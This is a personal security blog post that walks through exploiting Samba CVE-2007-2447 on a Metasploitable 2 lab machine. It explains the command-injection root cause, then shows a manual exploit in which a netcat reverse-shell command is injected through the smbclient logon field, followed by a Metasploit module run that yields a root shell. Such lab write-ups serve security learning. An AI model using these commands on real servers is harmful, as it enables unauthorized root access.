Linxz' Blog

Still trying to think of something witty, I will let you know once I get something...

Home Blog
14 November 2018

Samba CVE2007-2447

Tags: command execution - exploit - python


On May 7th 2007, a vulnerability found within Samba was reported via email to their mail alias. This bug was initially reported against the anonymous calls to the SamrChangePassword() MS-RPC function in combination with the “username map script” smb.conf option (which is not enabled by default). The bug was disclosed publicly on May 14th.

However, after investigation from developers at Samba they found the bug to be much broader noting that it also impacted remote printer & file share management. The root cause is due to passing unfiltered user input provided by MS-RPC calls to /bin/sh when invoking external scripts defined in smb.conf. Interestingly the vulnerability found with the “username map script” can be exploited without authenticatiton unlike the bug found in remote printer & file share management scripts, those require an authenticated session.

So, how does it work?

In general there isn’t much to discuss regarding this bug, it’s fairly simple - by sending shell metacharacters into the username we trigger the bug which in turn allows us to send aribitary commands to the device through the username field when attempting an SMB connection. As we mentioned earlier, no authenication is required to exploit this due to the fact that the option is used to map usernames prior to authentication and thus we can exploit this whilst being unauthenticated.

Code Review

Sadly I was unable to find the source code that was affected for this CVE thus I cannot do a review on it, I’m not sure if anyone has it but if you do I’d greatly appreciate it! You can contact me on Twitter which is linked at the bottom of the page.


We can exploit this vulnerability using the Metasploit module however, this is another exploit that is easy to execute manually. As per usual we will exploit the vulnerability with Metasploit, manually and write our own script for the exploit.

It’s worth noting in the below examples I am using Metasploitable 2

Manual Exploitation

Exploiting this one manually has a few steps but it’s not too tricky, it’s not exactly efficient but it does the trick! Firstly we need to setup a listening on netcat, open a termninal and use netcat -nvlp the actual listener is defined with l so you might be wondering what all of this means? Well, -n tells Netcat not to resolve names, -v specifies to give us a verbose output when printing, -l specifies to create the listener as we mentioned and -p will create that listener on any local port.

root@LinxzSecKali:~# netcat -nvlp 4444
listening on [any] 4444 ...

Once we have the listener setup we are now going to open a new terminal and check the victims shares, we can do this with smbclient -L // where -L will get a list of shares available on a host. We’re using Metasploitable 2 as mentioned.

root@LinxzSecKali:~# smbclient -L //
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------

We’re going to focus on the tmp folder & attempt to connect to the victim using smbclient // now you should receive the following back from the target.

root@LinxzSecKali:~# smbclient  //
Enter WORKGROUP\root's password: 
Anonymous login successful

Next, we need to setup the reverse shell, you should see a prompt that looks like this after the previous command smb: \> this is good news, next we need to send logon to the target with logon logon/=`nc 4444 -e /bin/bash this time make sure you use your machines ip & not the targets! If we switch back to our terminal we created the netcat listener in you should see this.

root@LinxzSecKali:~# netcat -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 36513

Now you can execute commands and see that we’ve owned the machine! As I mentioned, there’s a few steps for us to carry out but it’s all relatively simple stuff. If in doubt just use --help :p

Metasploit Exploitation

Load Metasploit using msfconsole then run use exploit/multi/samba/usermap_script this will tell Metasploit to use that module, next you will need to set the rhost with the IP address of your target, you don’t need to specify another payload for the bind shell as the Metasploit module will do this for you on your machines IP & port 4444. That’s it! You now have a shell with whatever privliges the account Samba is running on has.

msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/samba/usermap_script) > set RHOST
msf exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iogIbtev3qMtahR5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iogIbtev3qMtahR5\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2018-11-17 15:35:19 +0000

uid=0(root) gid=0(root)

Python Exploitation


Samba Security CVE2007-2447

Rapid 7 Metasploit Module

CVE Details 2007-2447